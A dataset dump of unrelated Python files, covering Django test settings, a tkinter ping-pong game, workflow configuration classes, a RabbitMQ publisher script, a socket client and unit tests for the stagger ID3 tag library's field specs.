def __rad<caret>
| StarcoderdataPython |
3379672 | <reponame>trevoriancox/django-google-analytics
SECRET_KEY = 'foo'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3'
}
}
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sites',
'django.contrib.sessions',
'google_analytics',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"django.core.context_processors.request",
)
STATIC_URL = ''
SITE_ID = 1
GOOGLE_ANALYTICS = {
'google_analytics_id': 'ua-test-id',
}
ROOT_URLCONF = 'google_analytics.urls'
| StarcoderdataPython |
1726779 | #!/usr/bin/env python
CONST = 3.14
if __name__ == '__main__':
print 'Excecuting as a script'
print 'End of %s' % (__file__)
| StarcoderdataPython |
119903 | <filename>fiat/stages.py
"""
base:
<NAME> <<EMAIL>>
Copyright 2020-2021, <NAME>
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
"""
from __future__ import annotations
import collections.abc
import copy
import dataclasses
import itertools
from types import ModuleType
from typing import (Any, Callable, ClassVar, Dict, Hashable, Iterable, List,
Mapping, MutableMapping, MutableSequence, Optional,
Sequence, Set, Tuple, Type, Union)
import denovo
import more_itertools
import fiat
@dataclasses.dataclass
class Section(denovo.quirks.Factory, denovo.containers.Lexicon):
"""Section of Outline with connections.
Args:
contents (MutableMapping[Hashable, Any]]): stored dictionary. Defaults
to an empty dict.
default_factory (Any): default value to return when the 'get' method is
used. Defaults to None.
"""
contents: Dict[str, Any] = dataclasses.field(default_factory = dict)
default_factory: Any = None
name: str = None
sources: ClassVar[Mapping[Type, str]] = {
fiat.shared.bases.settings : 'settings'}
""" Properties """
@property
def bases(self) -> Dict[str, str]:
return self._get_bases()
@property
def connections(self) -> Dict[str, List[str]]:
return self._get_connections()
@property
def designs(self) -> Dict[str, str]:
return self._get_designs()
@property
def nodes(self) -> List[str]:
key_nodes = list(self.connections.keys())
value_nodes = list(
itertools.chain.from_iterable(self.connections.values()))
return denovo.tools.deduplicate(item = key_nodes + value_nodes)
@property
def other(self) -> Dict[str, str]:
return self._get_other()
@property
def suffixes(self) -> List[str]:
return denovo.shared.library.subclasses.suffixes
""" Public Methods """
@classmethod
def from_settings(cls,
settings: fiat.shared.bases.settings,
name: str,
**kwargs) -> Section:
"""[summary]
Args:
settings (fiat.shared.bases.settings): [description]
name (str):
Returns:
Section: derived from 'settings'.
"""
return cls(contents = settings[name], name = name, **kwargs)
""" Private Methods """
def _get_bases(self) -> Dict[str, str]:
"""[summary]
Returns:
Dict[str, str]: [description]
"""
bases = {}
for key in self.connections.keys():
prefix, suffix = denovo.tools.divide_string(key)
values = denovo.tools.listify(self[key])
if suffix.endswith('s'):
base = suffix[:-1]
else:
base = suffix
bases.update(dict.fromkeys(values, base))
return bases
def _get_connections(self) -> Dict[str, List[str]]:
"""[summary]
Returns:
Dict[str, List[str]]: [description]
"""
connections = {}
keys = [k for k in self.keys() if k.endswith(self.suffixes)]
for key in keys:
prefix, suffix = denovo.tools.divide_string(key)
values = denovo.tools.listify(self[key])
if prefix == suffix:
if prefix in connections:
connections[self.name].extend(values)
else:
connections[self.name] = values
else:
if prefix in connections:
connections[prefix].extend(values)
else:
connections[prefix] = values
return connections
def _get_designs(self) -> Dict[str, str]:
"""[summary]
Returns:
Dict[str, str]: [description]
"""
designs = {}
design_keys = [k for k in self.keys() if k.endswith('_design')]
for key in design_keys:
prefix, suffix = denovo.tools.divide_string(key)
designs[prefix] = self[key]
return designs
def _get_other(self) -> Dict[str, str]:
"""[summary]
Returns:
Dict[str, str]: [description]
"""
design_keys = [k for k in self.keys() if k.endswith('_design')]
connection_keys = [k for k in self.keys() if k.endswith(self.suffixes)]
exclude = design_keys + connection_keys
return {k: v for k, v in self.contents.items() if k not in exclude}
@dataclasses.dataclass
class Outline(denovo.quirks.Factory, denovo.containers.Lexicon):
"""Organized fiat project settings with convenient accessors.
Args:
contents (denovo.configuration.TwoLevel): a two-level nested dict for
storing configuration options. Defaults to en empty dict.
default (Any): default value to return when the 'get' method is used.
Defaults to an empty dict.
default (Mapping[str, Mapping[str]]): any default options that should
be used when a user does not provide the corresponding options in
their configuration settings. Defaults to an empty dict.
infer_types (bool): whether values in 'contents' are converted to other
datatypes (True) or left alone (False). If 'contents' was imported
from an .ini file, all values will be strings. Defaults to True.
"""
contents: MutableMapping[str, Section] = dataclasses.field(
default_factory = dict)
default_factory: Any = None
sources: ClassVar[Mapping[Type, str]] = {
fiat.shared.bases.settings : 'settings'}
""" Properties """
@property
def bases(self) -> Dict[str, str]:
return self._get_bases()
@property
def connections(self) -> Dict[str, List[str]]:
return self._get_connections()
@property
def designs(self) -> Dict[str, str]:
return self._get_designs()
@property
def initialization(self) -> Dict[str, Any]:
return self._get_initialization()
@property
def nodes(self) -> List[str]:
key_nodes = list(self.connections.keys())
value_nodes = list(
itertools.chain.from_iterable(self.connections.values()))
return denovo.tools.deduplicate(item = key_nodes + value_nodes)
@property
def other(self) -> Dict[str, Any]:
return self._get_other()
""" Public Methods """
@classmethod
def from_settings(cls,
settings: fiat.shared.bases.settings,
**kwargs) -> Outline:
"""[summary]
Args:
Returns:
Outline: derived from 'settings'.
"""
return fiat.workshop.settings_to_outline(settings = settings, **kwargs)
""" Private Methods """
def _get_bases(self) -> Dict[str, str]:
"""[summary]
Returns:
Dict[str, str]: [description]
"""
bases = dict(zip(self.nodes, self.nodes))
for section in self.values():
bases.update(section.bases)
return bases
def _get_connections(self) -> Dict[str, List[str]]:
"""[summary]
Returns:
Dict[str, List[str]]: [description]
"""
connections = {}
for section in self.values():
for key, links in section.connections.items():
if key in connections:
connections[key].extend(links)
else:
connections[key] = links
return connections
def _get_designs(self) -> Dict[str, str]:
"""[summary]
Returns:
Dict[str, str]: [description]
"""
designs = {}
for section in self.values():
designs.update(section.designs)
return designs
def _get_initialization(self) -> Dict[str, Dict[str, Any]]:
"""[summary]
Returns:
Dict[str, Dict[str, Any]]: [description]
"""
initialization = collections.defaultdict(dict)
keys = [k.endswith('_parameters') for k in self.keys]
for key in keys:
prefix, suffix = denovo.tools.divide_string(key)
initialization[prefix] = self[key]
return initialization
def _get_other(self) -> Dict[str, str]:
"""[summary]
Returns:
Dict[str, str]: [description]
"""
other = {}
for section in self.values():
other.update(section.other)
return other
@dataclasses.dataclass
class Workflow(denovo.structures.System):
"""Project workflow implementation as a directed acyclic graph (DAG).
Workflow stores its graph as an adjacency list. Despite being called an
"adjacency list," the typical and most efficient way to create one in python
is using a dict. The keys of the dict are the nodes and the values are sets
of the hashable summarys of other nodes.
Workflow internally supports autovivification where a set is created as a
value for a missing key.
Args:
contents (Adjacency): an adjacency list where the keys are nodes and the
values are sets of hash keys of the nodes which the keys are
connected to. Defaults to an empty a defaultdict described in
'_DefaultAdjacency'.
"""
contents: denovo.structures.Adjacency = dataclasses.field(
default_factory = lambda: collections.defaultdict(set))
""" Properties """
@property
def cookbook(self) -> fiat.base.Cookbook:
"""Returns the stored workflow as a Cookbook of Recipes."""
return fiat.workshop.workflow_to_cookbook(source = self)
""" Dunder Methods """
def __str__(self) -> str:
"""Returns prettier summary of the stored graph.
Returns:
str: a formatted str of class information and the contained
adjacency list.
"""
return denovo.tools.beautify(item = self, package = 'fiat')
| StarcoderdataPython |
35326 | import socket
HOST = ""
PORT = ""
def address():
global HOST
print("What is the IP of the computer you want to connect to? ")
HOST = input(":")
global PORT
print("What is the PORT of the computer you want to connect to? ")
PORT = int(input(":"))
connector()
def connector():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
s.sendall(b"test")
data = s.recv(1024)
print(f"Received {data!r}")
address()
| StarcoderdataPython |
194215 | <filename>Cap02/Lab01/game_v1.py
# Game Ping-Pong
from tkinter import * # equivalente a importar pacotes
import random
import time
level = int(input("Qual nível você gostaria de jogar? 1/2/3/4/5 \n")) # variável level
length = 500/level # variável length
root = Tk() # Variável
root.title("Ping Pong") # função title() sobre variável root
root.resizable(0,0) # função resizable() sobre variável root
root.wm_attributes("-topmost", -1) # função wm_attributes() sobre variável root
canvas = Canvas(root, width=800, height=600, bd=0,highlightthickness=0) # variável canvas
canvas.pack() # função pack() sobre variável canvas
root.update() # função update() sobre variável root
# o bloco de código até aqui cria a janela onde o jogo acontece
# Variável
count = 0
lost = False
class Bola: # define as configurações e o movimento da bola????
def __init__(self, canvas, Barra, color):
self.canvas = canvas
self.Barra = Barra
self.id = canvas.create_oval(0, 0, 15, 15, fill=color)
self.canvas.move(self.id, 245, 200)
starts_x = [-3, -2, -1, 1, 2, 3] # cria uma lista
random.shuffle(starts_x) # aleatoriza os valores da lista starts_x
self.x = starts_x[0]
self.y = -3
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
def draw(self): # define o movimento da Barra???
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 3
if pos[3] >= self.canvas_height:
self.y = -3
if pos[0] <= 0:
self.x = 3
if pos[2] >= self.canvas_width:
self.x = -3
self.Barra_pos = self.canvas.coords(self.Barra.id)
if pos[2] >= self.Barra_pos[0] and pos[0] <= self.Barra_pos[2]: # define a contagem dos pontos???
if pos[3] >= self.Barra_pos[1] and pos[3] <= self.Barra_pos[3]:
self.y = -3
global count
count +=1
score()
if pos[3] <= self.canvas_height: # definie a perda do jogo quando a Barra erra a Bola????
self.canvas.after(10, self.draw)
else:
game_over()
global lost
lost = True
class Barra: # define as configurações e movimento da barra????
def __init__(self, canvas, color):
self.canvas = canvas
self.id = canvas.create_rectangle(0, 0, length, 10, fill=color)
self.canvas.move(self.id, 200, 400)
self.x = 0
self.canvas_width = self.canvas.winfo_width()
self.canvas.bind_all("<KeyPress-Left>", self.move_left)
self.canvas.bind_all("<KeyPress-Right>", self.move_right)
def draw(self):
self.canvas.move(self.id, self.x, 0)
self.pos = self.canvas.coords(self.id)
if self.pos[0] <= 0:
self.x = 0
if self.pos[2] >= self.canvas_width:
self.x = 0
global lost
if lost == False:
self.canvas.after(10, self.draw)
def move_left(self, event):
if self.pos[0] >= 0:
self.x = -3
def move_right(self, event):
if self.pos[2] <= self.canvas_width:
self.x = 3
def start_game(event):
global lost, count
lost = False
count = 0
score()
canvas.itemconfig(game, text=" ")
time.sleep(1)
Barra.draw()
Bola.draw()
def score():
canvas.itemconfig(score_now, text="Pontos: " + str(count))
def game_over():
canvas.itemconfig(game, text="Game over!")
Barra = Barra(canvas, "orange") # definie a cor da barra
Bola = Bola(canvas, Barra, "purple") # define a cor da bola
score_now = canvas.create_text(430, 20, text="Pontos: " + str(count), fill = "green", font=("Arial", 16))
game = canvas.create_text(400, 300, text=" ", fill="red", font=("Arial", 40))
canvas.bind_all("<Button-1>", start_game)
root.mainloop()
| StarcoderdataPython |
169297 | <filename>ws/RLAgents/E_SelfPlay/play/greedy_player_mgt.py
def greedy_player_mgt(game_mgr):
game_mgr = game_mgr
def fn_get_action(pieces):
valid_moves = game_mgr.fn_get_valid_moves(pieces, 1)
if valid_moves is None:
return None
candidates = []
for a in range(game_mgr.fn_get_action_size()):
if valid_moves[a]==0:
continue
nextPieces = game_mgr.fn_get_next_state(pieces, 1, a)
score = game_mgr.fn_get_score(nextPieces, 1)
candidates += [(-score, a)]
candidates.sort()
return candidates[0][1]
return fn_get_action | StarcoderdataPython |
1761341 | <gh_stars>0
from os import environ
import argparse
from infcommon import logger
from infrabbitmq import factory as infrabbitmq_factory
def main(destination_exchange, broker_uri, event_name, network, data):
infrabbitmq_factory.configure_pika_logger_to_error()
event_publisher = infrabbitmq_factory.rabbitmq_event_publisher(exchange=destination_exchange, broker_uri=broker_uri)
event_publisher.publish(event_name=event_name, network=network, data=data)
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--destination_exchange', action='store', default='events', help='Default exchange is events')
parser.add_argument('-e', '--event_name', action='store', required=True, help='')
parser.add_argument('-n', '--network', action='store', required=True, help='Network name (ilo, c2k, ...)')
parser.add_argument('-o', '--operations', action='store_true', default=False, help='Publish to operations broker')
parser.add_argument('data')
args = parser.parse_args()
if args.operations:
broker_uri = environ['OPERATIONS_BROKER_URI']
else:
broker_uri = environ['BROKER_URI']
main(destination_exchange=args.destination_exchange, broker_uri=broker_uri, event_name=args.event_name, network=args.network, data=args.data)
except Exception as exc:
logger.critical(f'EventPublisher Fails. exc_type: {type(exc)} exc: {exc}',
exc_info=True)
| StarcoderdataPython |
1792165 | <filename>config.py
CONFIG = [
{
'id': 1,
'name': 'Background',
'directory': 'Background',
'required': True,
'rarity_weights': None,
},
{
'id': 2,
'name': 'Dinos',
'directory': 'Dinos',
'required': True,
'rarity_weights': None,
},
{
'id': 3,
'name': 'Accessories',
'directory': 'Accessories',
'required': True,
'rarity_weights': None,
}
]
| StarcoderdataPython |
3230496 | <reponame>houzw/knowledge-base-data
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/9/25 9:19
from owlready2 import *
test_ont = get_ontology('http://www.test.org#')
rdf = get_ontology('http://www.w3.org/1999/02/22-rdf-syntax-ns#')
rdfs = get_ontology('http://www.w3.org/2000/01/rdf-schema#')
with test_ont:
class Resource(Thing):
namespace = rdfs
isDefinedBy = 'http://www.w3.org/2000/01/rdf-schema#'
label = "Resource"
comment = "The class resource, everything."
class Literal(Resource):
namespace = rdfs
isDefinedBy = 'http://www.w3.org/2000/01/rdf-schema#'
label = "Literal"
comment = "The class of literal values, eg. textual strings and integers."
class List(Resource):
isDefinedBy = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
namespace = rdf
label = "List"
comment = "The class of RDF Lists."
class first(ObjectProperty):
isDefinedBy = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
namespace = rdf
label = "first"
comment = "The first item in the subject RDF list."
domain = [List]
range = [Resource]
class rest(ObjectProperty):
isDefinedBy = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
namespace = rdf
label = "rest"
comment = "The rest of the subject RDF list after the first item."
domain = [List]
range = [List]
nil = List('nil', label='nil', comment='The empty list, with no items in it. If the rest of a list is nil then the list has no more items in it.', namespace=test_ont)
print(Resource)
l = ['a', 'b', 'c', 'd']
testl = List(0, namespace=test_ont)
print(nil)
def create_list(rdf_list, words):
rdf_list.first = [Literal(words[0], namespace=test_ont)]
if len(words) == 1:
rdf_list.rest.append(nil)
return rdf_list
_rdf_list = List(0, namespace=test_ont)
rdf_list.rest.append(create_list(_rdf_list, words[1:]))
return rdf_list
create_list(testl, l)
print(testl)
print(testl.first)
print(testl.rest)
# test_ont.save("list_test.owl")
| StarcoderdataPython |
3214496 | <gh_stars>1-10
from PySide2 import QtCore
from PySide2.QtWidgets import QSlider
class UISliderWidget(QSlider):
'''Creates a Slider widget which updates
a QLabel with its value (which may be scaled
to a non-integer value by setting the scale_factor)'''
def __init__(self, label, scale_factor=1):
QSlider.__init__(self)
self.label = label
self.scale_factor = scale_factor
self.setOrientation(QtCore.Qt.Horizontal)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.setTickPosition(QSlider.TicksBelow)
self.valueChanged.connect(self.show_slider_value)
def get_slider_value(self):
return self.value()*self.scale_factor
def show_slider_value(self):
value = self.get_slider_value()
self.label.setText(str(value)) | StarcoderdataPython |
4814256 | import copy
import jsonpickle
import sys
import getopt
import BingoBoard
import ChoicePool
opts = getopt.getopt(sys.argv[1:], 'e:y:o:')
excel = False
file = ""
outputFile = 'output.json'
for o, a in opts[0]:
if o == '-e':
excel = True
file = a
elif o == '-y':
excel = False
file = a
elif o == '-o':
if not outputFile.endswith(".json"):
raise ValueError("Output file must end with .json, currently only json is supported.")
outputFile = a
if file == "":
raise ValueError("You must specify an input file.")
if excel:
import pandas
dataframe: pandas.DataFrame = pandas.read_excel(io=file)
choices = dataframe['Bingo Choices'].tolist()
else:
import yaml
from yaml import BaseLoader
with open(file, "r") as f:
yamlInput = f.read()
yamlOutput = yaml.load(yamlInput, Loader=BaseLoader)
choices = yamlOutput['choices']
choice_pool = ChoicePool.ChoicePool(choices)
bingo_board = BingoBoard.BingoBoard(choice_pool)
with open(outputFile, 'w') as file:
file.write(jsonpickle.encode(bingo_board.getBoard()))
| StarcoderdataPython |
3234386 | <gh_stars>1-10
#!/usr/bin/env python3
# specs.py
# https://github.com/Jelmerro/stagger
#
# Copyright (c) 2022-2022 <NAME>
# Copyright (c) 2009-2011 <NAME> <<EMAIL>>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import unittest
import warnings
from stagger.errors import Warning, FrameError
from stagger.frames import TextFrame
from stagger.specs import ByteSpec, IntegerSpec, SignedIntegerSpec, VarIntSpec
from stagger.specs import RVADIntegerSpec, BinaryDataSpec, SimpleStringSpec
from stagger.specs import NullTerminatedStringSpec, URLStringSpec, EncodingSpec
from stagger.specs import EncodedStringSpec, SequenceSpec, MultiSpec, ASPISpec
from stagger.specs import PictureTypeSpec
class SpecTestCase(unittest.TestCase):
def testByteSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = ByteSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02"), (1, b"\x02"))
self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
# spec.write
self.assertEqual(spec.write(frame, 5), b"\x05")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 256)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testIntegerSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = IntegerSpec("test", 16)
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
self.assertEqual(spec.read(frame, b"\x01\x02"), (258, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 65537)
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
# Now try specifying an indirect width
spec = IntegerSpec("test", "bits")
# spec.read
frame.bits = 8
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(1, b"\x02\x03\x04"))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertEqual(spec.read(frame, b"\x01"), (1, b""))
frame.bits = 16
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
frame.bits = 8
self.assertEqual(spec.write(frame, 1), b"\x01")
self.assertRaises(ValueError, spec.write, frame, 258)
frame.bits = 16
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
# spec.validate
frame.bits = 8
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertRaises(ValueError, spec.validate, frame, 256)
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
frame.bits = 16
self.assertEqual(spec.validate(frame, 5), 5)
self.assertRaises(ValueError, spec.validate, frame, -1)
self.assertEqual(spec.validate(frame, 256), 256)
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testSignedIntegerSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = SignedIntegerSpec("test", 16)
# spec.read
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
self.assertEqual(spec.read(frame, b"\x01\x02"), (258, b""))
self.assertEqual(spec.read(frame, b"\xFF\xFF"), (-1, b""))
self.assertEqual(spec.read(frame, b"\x80\x00"), (-32768, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
self.assertEqual(spec.write(frame, -1), b"\xFF\xFF")
self.assertEqual(spec.write(frame, -2), b"\xFF\xFE")
self.assertEqual(spec.write(frame, -32768), b"\x80\x00")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertEqual(spec.validate(frame, -1), -1)
self.assertEqual(spec.validate(frame, 32767), 32767)
self.assertEqual(spec.validate(frame, -32768), -32768)
self.assertRaises(ValueError, spec.validate, frame, 32768)
self.assertRaises(ValueError, spec.validate, frame, -32769)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testRVADIntegerSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = RVADIntegerSpec("test", "bits", signbit=4)
frame.signs = 0
frame.bits = 16
# spec.read
frame.signs = 255
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
frame.signs = 16
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(258, b"\x03\x04"))
frame.signs = 0
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(-258, b"\x03\x04"))
frame.signs = 239
self.assertEqual(spec.read(frame, b"\x01\x02\x03\x04"),
(-258, b"\x03\x04"))
frame.signs = 255
self.assertEqual(spec.read(frame, b"\x01\x02"), (258, b""))
self.assertEqual(spec.read(frame, b"\xFF\xFF"), (65535, b""))
self.assertEqual(spec.read(frame, b"\x80\x00"), (32768, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
frame.signs = 0
self.assertEqual(spec.read(frame, b"\x01\x02"), (-258, b""))
self.assertEqual(spec.read(frame, b"\xFF\xFF"), (-65535, b""))
self.assertEqual(spec.read(frame, b"\x80\x00"), (-32768, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x01")
# spec.write
frame.signs = 0
self.assertEqual(spec.write(frame, 1), b"\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x01\x02")
self.assertEqual(spec.write(frame, 32768), b"\x80\x00")
self.assertEqual(frame.signs, 0) # Write shouldn't update signs
self.assertEqual(spec.write(frame, -1), b"\x00\x01")
self.assertEqual(spec.write(frame, -258), b"\x01\x02")
self.assertEqual(spec.write(frame, -32768), b"\x80\x00")
self.assertEqual(frame.signs, 0)
# spec.validate
frame.signs = 0
self.assertEqual(spec.validate(frame, 5), 5)
self.assertEqual(frame.signs, 16) # Validate updates signs
frame.signs = 0
self.assertEqual(spec.validate(frame, -1), -1)
self.assertEqual(frame.signs, 0)
frame.signs = 0
self.assertEqual(spec.validate(frame, 65535), 65535)
self.assertEqual(frame.signs, 16)
frame.signs = 0
self.assertEqual(spec.validate(frame, -65535), -65535)
self.assertEqual(frame.signs, 0)
frame.signs = 0
self.assertRaises(ValueError, spec.validate, frame, 65536)
self.assertEqual(frame.signs, 16)
frame.signs = 0
self.assertRaises(ValueError, spec.validate, frame, -65536)
self.assertEqual(frame.signs, 0)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testVarIntSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = VarIntSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b"\x10\x01\x02\x03"), (258, b"\x03"))
self.assertEqual(spec.read(frame, b"\x10\xFF\xFF"), (65535, b""))
self.assertEqual(spec.read(frame, b"\x08\x05"), (5, b""))
self.assertEqual(spec.read(frame, b"\x01\x05"), (5, b""))
self.assertEqual(spec.read(frame, b"\x02\x05"), (5, b""))
self.assertRaises(EOFError, spec.read, frame, b"")
self.assertRaises(EOFError, spec.read, frame, b"\x08")
self.assertRaises(EOFError, spec.read, frame, b"\x10\x01")
# spec.write
self.assertEqual(spec.write(frame, 0), b"\x20\x00\x00\x00\x00")
self.assertEqual(spec.write(frame, 1), b"\x20\x00\x00\x00\x01")
self.assertEqual(spec.write(frame, 258), b"\x20\x00\x00\x01\x02")
self.assertEqual(spec.write(frame, 1 << 32),
b"\x40\x00\x00\x00\x01\x00\x00\x00\x00")
# spec.validate
self.assertEqual(spec.validate(frame, 5), 5)
self.assertEqual(spec.validate(frame, 1 << 32), 1 << 32)
self.assertEqual(spec.validate(frame, 1 << 64 + 3), 1 << 64 + 3)
self.assertRaises(ValueError, spec.validate, frame, -32769)
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testBinaryDataSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = BinaryDataSpec("test")
# spec.read
self.assertEqual(spec.read(frame, b""), (b"", b""))
self.assertEqual(spec.read(frame, b"\x01"), (b"\x01", b""))
self.assertEqual(spec.read(frame, bytes(range(100))),
(bytes(range(100)), b""))
# spec.write
self.assertEqual(spec.write(frame, b""), b"")
self.assertEqual(spec.write(frame, b"\x01\x02"), b"\x01\x02")
self.assertEqual(spec.write(frame, bytes(range(100))),
bytes(range(100)))
# spec.validate
self.assertEqual(spec.validate(frame, b""), b"")
self.assertEqual(spec.validate(frame, b"12"), b"12")
self.assertRaises(TypeError, spec.validate, frame, 1)
self.assertRaises(TypeError, spec.validate, frame, [1, 2])
self.assertRaises(TypeError, spec.validate, frame, "foobar")
def testSimpleStringSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = SimpleStringSpec("test", 6)
# spec.read
self.assertEqual(spec.read(frame, b"Foobar"), ("Foobar", b""))
self.assertEqual(spec.read(frame, b"Foobarbaz"), ("Foobar", b"baz"))
self.assertEqual(spec.read(frame, b"F\xF6\xF8b\xE1r"),
("F\u00F6\u00F8b\u00E1r", b""))
# spec.write
self.assertEqual(spec.write(frame, "Foobar"), b"Foobar")
self.assertEqual(spec.write(
frame, "F\u00F6\u00F8b\u00E1r"), b"F\xF6\xF8b\xE1r")
# spec.validate
self.assertEqual(spec.validate(frame, "Foobar"), "Foobar")
self.assertEqual(spec.validate(
frame, "F\u00F6\u00F8b\u00E1r"), "F\u00F6\u00F8b\u00E1r")
self.assertRaises(TypeError, spec.validate, frame, 1)
self.assertRaises(TypeError, spec.validate, frame, [1, 2])
self.assertRaises(TypeError, spec.validate, frame, b"foobar")
self.assertRaises(UnicodeEncodeError, spec.validate,
frame, "\u2011oobar")
def nullstringhelper(self, frame, spec):
# spec.read
self.assertEqual(spec.read(frame, b""), ("", b""))
self.assertEqual(spec.read(frame, b"\x00"), ("", b""))
self.assertEqual(spec.read(frame, b"Foo"), ("Foo", b""))
self.assertEqual(spec.read(frame, b"Foo\x00"), ("Foo", b""))
self.assertEqual(spec.read(frame, b"Foo\x00Bar"), ("Foo", b"Bar"))
self.assertEqual(spec.read(frame, b"F\xF6\xF8b\xE1r\x00Bar"),
("F\u00F6\u00F8b\u00E1r", b"Bar"))
# spec.write
self.assertEqual(spec.write(frame, "Foobar"), b"Foobar\x00")
self.assertEqual(spec.write(
frame, "F\u00F6\u00F8b\u00E1r"), b"F\xF6\xF8b\xE1r\x00")
# spec.validate
self.assertEqual(spec.validate(frame, "Foobar"), "Foobar")
self.assertEqual(spec.validate(
frame, "F\u00F6\u00F8b\u00E1r"), "F\u00F6\u00F8b\u00E1r")
self.assertRaises(TypeError, spec.validate, frame, 1)
self.assertRaises(TypeError, spec.validate, frame, [1, 2])
self.assertRaises(TypeError, spec.validate, frame, b"foobar")
self.assertRaises(UnicodeEncodeError, spec.validate,
frame, "\u2011oobar")
def testNullTerminatedStringSpec(self):
frame = TextFrame(frameid="TEST", encoding=3)
spec = NullTerminatedStringSpec("test")
self.nullstringhelper(frame, spec)
self.assertEqual(spec.read(frame, b"\x00\x00"), ("", b"\x00"))
self.assertEqual(spec.read(frame, b"Foo\x00\x00"), ("Foo", b"\x00"))
self.assertEqual(spec.read(frame, b"Foo\x00Bar\x00"),
("Foo", b"Bar\x00"))
self.assertEqual(spec.read(frame, b"\x00Bar\x00"), ("", b"Bar\x00"))
